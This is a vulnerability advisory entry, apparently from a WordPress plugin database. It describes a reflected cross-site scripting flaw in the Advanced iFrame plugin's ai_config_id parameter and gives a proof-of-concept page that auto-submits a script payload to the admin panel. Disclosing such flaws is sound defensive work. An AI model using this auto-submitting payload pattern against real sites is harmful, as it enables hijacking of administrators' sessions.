WordPress Plugin Vulnerabilities
Advanced iFrame < 2022 - Reflected Cross-Site Scripting
Description
The plugin does not sanitise and escape the ai_config_id parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue
Proof of Concept
<html>
<body>
<form action="https://example.com/wp-admin/admin.php?page=advanced-iframe.php" id="hack" method="POST">
<input type="hidden" name="create-id" value="1" />
<input type="hidden" name="ai_config_id" value="<script>alert(/XSS/);</script>" />
<input type="submit" value="Submit request" />
</form>
</body>
<script>
var form1 = document.getElementById('hack');
form1.submit();
</script>
</html>
Affects Plugins
Fixed in version 2022
References
Classification
Miscellaneous
Original Researcher
JrXnm
Submitter
JrXnm
Submitter website
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2022-02-02 (about 5 months ago)
Added
2022-02-02 (about 5 months ago)
Last Updated
2022-04-09 (about 2 months ago)